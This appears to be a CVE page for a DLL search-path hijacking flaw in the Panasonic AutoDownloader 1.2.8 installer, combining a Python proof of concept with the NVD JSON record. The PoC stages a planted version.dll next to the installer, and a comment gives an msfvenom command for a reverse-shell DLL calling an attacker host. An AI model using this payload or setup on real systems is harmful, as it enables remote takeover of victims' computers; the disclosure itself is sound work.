CVE-2025-11223

# CVE-2025-11223 - Panasonic AutoDownloader DLL Search Path Hijacking PoC # This PoC demonstrates the DLL search path hijacking vulnerability # in Panasonic AutoDownloader installer version 1.2.8 import os import shutil # Step 1: Identify target DLLs that the installer attempts to load # Common DLLs that may be hijacked include: version.dll, wininet.dll, etc. TARGET_DLL = "version.dll" # Step 2: Create a malicious DLL using msfvenom or a custom C project # Example msfvenom command: # msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f dll -o version.dll def setup_attack_directory(installer_path, output_dir): """ Set up the attack directory by placing the malicious DLL alongside the legitimate installer executable. """ if not os.path.exists(installer_path): print(f"[ERROR] Installer not found: {installer_path}") return False # Create output directory if it doesn't exist os.makedirs(output_dir, exist_ok=True) # Copy the legitimate installer to the output directory installer_name = os.path.basename(installer_path) target_installer = os.path.join(output_dir, installer_name) shutil.copy2(installer_path, target_installer) print(f"[INFO] Installer copied to: {target_installer}") # Generate or place the malicious DLL in the same directory malicious_dll_path = os.path.join(output_dir, TARGET_DLL) # Note: The actual malicious DLL must be compiled separately # This is a placeholder - replace with actual malicious DLL generation print(f"[INFO] Place malicious DLL at: {malicious_dll_path}") print("[INFO] The malicious DLL should export the same functions as the legitimate one") return True def demonstrate_search_order(): """ Demonstrate the Windows DLL search order that leads to this vulnerability. Default search order: 1. The directory where the application loaded from 2. The system directory (C:\Windows\System32) 3. The 16-bit system directory 4. The Windows directory 5. The current working directory 6. Directories listed in the PATH environment variable """ search_order = [ "1. Application directory (highest priority - VULNERABLE)", "2. System directory (C:\\Windows\\System32)", "3. 16-bit system directory", "4. Windows directory (C:\\Windows)", "5. Current working directory", "6. PATH environment variable directories" ] print("=== Windows DLL Search Order ===") for step in search_order: print(step) print("\n[!] The installer loads DLLs from the application directory first,") print(" allowing an attacker to place a malicious DLL with the same name.") if __name__ == "__main__": print("=== CVE-2025-11223 PoC: DLL Search Path Hijacking ===") print("Target: Panasonic AutoDownloader v1.2.8 Installer\n") demonstrate_search_order() # Example usage: # setup_attack_directory("C:\\path\\to\\AutoDownloader_Setup.exe", "C:\\attack_dir") print("\n[NOTE] Social engineering is required to trick the user into") print(" running the installer from the attacker-controlled directory.")

{"cve": {"id": "CVE-2025-11223", "sourceIdentifier": "[email protected]", "published": "2025-10-03T08:15:30.387", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Installer of \n\nPanasonic \n\nAutoDownloader \n\n\n\n version 1.2.8\ncontains an issue with the DLL search path, which may lead to loading \n\na crafted DLL file in the same directory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://content.connect.panasonic.com/jp-ja/fai/file/66248", "source": "[email protected]"}]}}